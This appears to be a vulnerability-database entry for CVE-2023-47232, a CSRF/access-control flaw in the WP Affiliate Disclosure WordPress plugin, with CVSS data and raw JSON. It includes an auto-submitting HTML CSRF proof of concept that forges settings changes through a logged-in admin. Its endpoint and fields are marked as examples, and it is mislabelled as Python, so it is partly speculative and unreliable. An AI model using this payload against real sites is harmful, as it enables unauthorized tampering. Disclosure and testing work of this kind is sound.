Security Vulnerability Report
中文
CVE-2023-47232 CVSS 4.3 MEDIUM

CVE-2023-47232

Published: 2025-12-21 01:15:51
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Vulnerability in mojofywp WP Affiliate Disclosure wp-affiliate-disclosure.This issue affects WP Affiliate Disclosure: from n/a through 1.2.6.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

WP Affiliate Disclosure <= 1.2.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2023-47232 --> <!-- WordPress WP Affiliate Disclosure Plugin CSRF Exploit --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - CVE-2023-47232</title> </head> <body> <h1>CVE-2023-47232 CSRF PoC</h1> <p>This PoC demonstrates the CSRF vulnerability in WP Affiliate Disclosure plugin.</p> <!-- Auto-submit form for CSRF attack --> <form id="csrfForm" action="http://target-site/wp-admin/admin-post.php" method="POST"> <!-- Plugin's action endpoint (example) --> <input type="hidden" name="action" value="save_affiliate_disclosure"> <input type="hidden" name="nonce" value=""> <input type="hidden" name="disclosure_text" value="Malicious modified disclosure content"> <input type="hidden" name="settings_updated" value="1"> </form> <script> // Auto-submit after page load document.getElementById('csrfForm').submit(); </script> <p>If you see this message, the form was not auto-submitted.</p> <button onclick="document.getElementById('csrfForm').submit()">Submit Attack</button> </body> </html> <!-- Notes: 1. Replace 'target-site' with the actual WordPress site URL 2. The nonce field may be missing or improperly validated 3. This PoC is for educational and authorized testing purposes only 4. Requires target admin to be logged in and visit this page -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-47232", "sourceIdentifier": "[email protected]", "published": "2025-12-21T01:15:51.143", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in mojofywp WP Affiliate Disclosure wp-affiliate-disclosure.This issue affects WP Affiliate Disclosure: from n/a through 1.2.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://vdp.patchstack.com/database/wordpress/plugin/wp-affiliate-disclosure/vulnerability/wordpress-wp-affiliate-disclosure-plugin-1-2-6-broken-access-control-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.